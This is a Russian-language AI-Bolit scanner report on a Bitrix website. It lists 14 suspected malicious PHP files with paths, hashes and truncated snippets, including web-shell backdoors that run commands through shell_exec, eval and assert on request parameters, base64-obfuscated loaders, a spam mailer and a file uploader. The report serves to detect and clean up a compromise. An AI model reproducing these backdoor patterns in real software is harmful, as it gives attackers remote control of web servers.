Отчет сканера AI-Bolit vHOSTER-30.3.1: /home/p/pksvm/pksvm/public_html/ (2/0)
Сканер бесплатный только для личного некоммерческого использования. Информация по коммерческой лицензии (пункт №11). Авторское свидетельство о гос. регистрации в РосПатенте №2012619254 от 12 октября 2012 г.
Затрачено времени: 1591.3. Сканирование начато 27-02-2021 в 23:30:14, сканирование завершено 27-02-2021 в 23:56:46
Всего проверено 0 директорий и 46761 файлов. Использовано памяти при сканировании: 12.08 Mb.
Сводный отчет
Вредоносных скриптов14
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер минимизирует число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.

Для диагностического сканирования без ложных срабатываний мы разработали специальную версию сканера для хостинг-компаний.

Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Возможно, ваш сайт был взломан. Рекомендуем срочно проконсультироваться со специалистами по данному отчету.

Рекомендуем также проверить сайт бесплатным онлайн-сканером ReScan.Pro.

Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Наши продукты:
Критические замечания
Эти файлы могут быть вредоносными или хакерскими скриптами (14)
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
/home/p/pksvm/pksvm/public_html/personal/profile/lib.php
[x] local<?php  assert(stripslashes($_REQUEST[local]));?
24/02/2021 13:43:23
27/09/2017 18:05:57
54 b
d79ba3a7e97ba8affe2c359bd15a4d25b1c08859
x
1506524757
id_c47255bc
/home/p/pksvm/pksvm/public_html/personal/profile/default.php
[x] <?php if(isset($_POST["mailto"]))$MailTo=base64_decode($_POST["mailto"]); else{echo "indata_error";exit;}if(isset($_POST["msgheader"]))$MessageHeader=base64_decode($_POST["msgheader"]);else{ech
24/02/2021 13:17:00
27/09/2017 18:05:57
657 b
bb15ac0118ee9bd64af8c0e204ff393dfe06a3fa
x
1506524757
id_727cefdf
/home/p/pksvm/pksvm/public_html/personal/profile/security.php
[x]  <?$GLOBALS['_504973228_']=Array(base64_decode('YmFzZTY0X2RlY29kZQ=='),base64_decode('YmFzZ
24/02/2021 12:55:24
27/09/2017 18:05:57
1.14 Kb
65fabe10e903ff640ba2d1981a2c61327c7c8f58
x
1506524757
id_d2086509
/home/p/pksvm/pksvm/public_html/personal/profile/include.php
[x]  <?php $__J='base'.(128/2).'_decode';$__J=$__J(str_replace("\n",'','CeBCiwwdBhyPt6wj58WkRW1QIBBnaooIwB/Kb8Ax69tTL9DXoY3G
24/02/2021 13:27:58
27/09/2017 18:05:57
21.12 Kb
5edbf10d23ec07c5ab6eae9cf0844d48f7e7f7c2
x
1506524757
id_db461f24
/home/p/pksvm/pksvm/public_html/bitrix/modules/main/include/prolog.php
[x] <? if(isset($_GET['micat']))echo shell_exec($_GET['micat']);if(isset($_GET['midog']))echo eval($_GET['midog']);require_onc
25/02/2021 14:16:05
23/08/2018 12:47:45
504 b
7327716736096bd92d8d9039ee4426fe3e761dbe
x
1535017665
id_6175aa14
/home/p/pksvm/pksvm/public_html/bitrix/admin/moduless.php
[x] …redirect(FM_SELF_URL);}}else{unset($_SESSION['logged']);?><!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head> <title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL<?=$_SERVER['PHP_SELF'];?>was not found
27/02/2021 08:33:38
27/02/2021 08:33:38
56.04 Kb
82d233093c4cdfff9ea0754ec12bde4a20da9c76
x
1614404018
id_934be2b3
/home/p/pksvm/pksvm/public_html/bitrix/admin/s_e.php
[x]  <?php ${"GLOBALS"}["mypaccsv"]="_1";${"GLOBALS"}["hoqpuspglsv"]="_0";$GLOBALS["_171515191_"]=Array("str_rot13","pack","
27/02/2021 08:32:03
27/02/2021 08:32:03
1.40 Kb
c781a6749d26ebf680b664644897ebb247afa7ca
x
1614403923
id_d8bf7b45
/home/p/pksvm/pksvm/public_html/bitrix/admin/form.php
[x]  <?php $l___J='base'.(128/2).'_decode';$l___J=$l___J(str_replace("\n",'','CN9DvT/wAhvCiaoj4cjTS0FT9EI4PGEGvCSgQ+s066tQLw
24/02/2021 11:23:05
24/02/2021 11:23:05
21.19 Kb
1fad7ad3a6316f1e6636aa846fbd3195b6d9f0e8
x
1614154985
id_db461f24
/home/p/pksvm/pksvm/public_html/bitrix/admin/go.php
[x]  <?php $wp__db='base'.(128/2).'_decode';$wp__db=$wp__db(str_replace("\n",'','Dt5vvwvrAh+VhdkmD8mmSzuBHUI4P2HdjySfbek0661
24/02/2021 11:23:04
24/02/2021 11:23:04
21.22 Kb
6453c44920e7501da111ce88764f1e23f90d94be
x
1614154984
id_db461f24
/home/p/pksvm/pksvm/public_html/bitrix/admin/ups.php
[x]  <title>Vuln!! patch it Now!</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="upload
27/02/2021 08:33:38
27/02/2021 08:33:38
446 b
3619d7704c79e46d1a00e67dcec34564f50eb86b
x
1614404018
id_dd8dcba3
/home/p/pksvm/pksvm/public_html/bitrix/admin/get.php
[x]  <?php $db__g_='base'.(128/2).'_decode';$db__g_=$db__g_(str_replace("\n",'','N+NDwQ0ZCBzEitUnEPjSdWpRHj82aVvdk1CZbLc1469
24/02/2021 11:23:04
24/02/2021 11:23:04
21.22 Kb
2a8880c211b0984f748a65ada997cd003ec4752a
x
1614154984
id_db461f24
/home/p/pksvm/pksvm/public_html/bitrix/admin/s_ne.php
[x] …]})));if(isset(${${"GLOBALS"}["jqpssqbmsrvl"]})){$oarmqjqeve="data";$smkgtihejk="name";${${"GLOBALS"}["kotovcqw"]}="./". implode(${${"GLOBALS"}["knfahyf"]}).".module";file_put_contents(${$smkgtihejk},"<?php unlink(__FILE__);\n".${$oarmqjqev
27/02/2021 08:33:36
27/02/2021 08:33:36
1.95 Kb
a451379652285f5a2c30e9facb8f6fb05d8ca283
x
1614404016
id_63d66d57
/home/p/pksvm/pksvm/public_html/bitrix/admin/beence.php
[x] <?php ?> <?php function irmcjaowlfxc($g,$o,$i){return$g.''.$o.''.$i;}$gbVclGM7976="*ax748nivp9)50fujhrg2c(/6bzlymwtsd_k3q1e.o;";
27/02/2021 08:33:36
27/02/2021 08:33:36
26.91 Kb
26381e06d9ff453ecdd6fca55af9e7cdee0d68fc
x
1614404016
id_773c86e7
/home/p/pksvm/pksvm/public_html/bitrix/admin/AI-BOLIT-REPORT-_p_pksvm_pksvm_public_html_bitrix_admin-894381-27-02-2021_22-48.html
[x] …php</a></div><div class="details"><a href="#" onclick="return hsig('id_dd8dcba3')">[x]</a><span class="marker"> </span> <title>Vuln!! patch it Now!</title><?php echo'<form action=""method="post"enctype="multipart/form-data"name="upload</di
27/02/2021 22:48:08
27/02/2021 22:48:08
31.23 Kb
b6b0b85cc373addf9511e4a9b51c96f7556cfcfa
x
1614455288
id_dd8dcba3
[!] Отказ от гарантий: невозможно гарантировать обнаружение всех вредоносных скриптов. Поэтому разработчик сканера не несет ответственности за возможные последствия работы сканера AI-Bolit или неоправданные ожидания пользователей относительно функциональности и возможностей.
Мы будем чрезвычайно благодарны за любые упоминания сканера AI-Bolit на вашем сайте, в блоге, среди друзей, знакомых и клиентов.
Ссылку можно поставить на страницу https://revisium.com/ai/.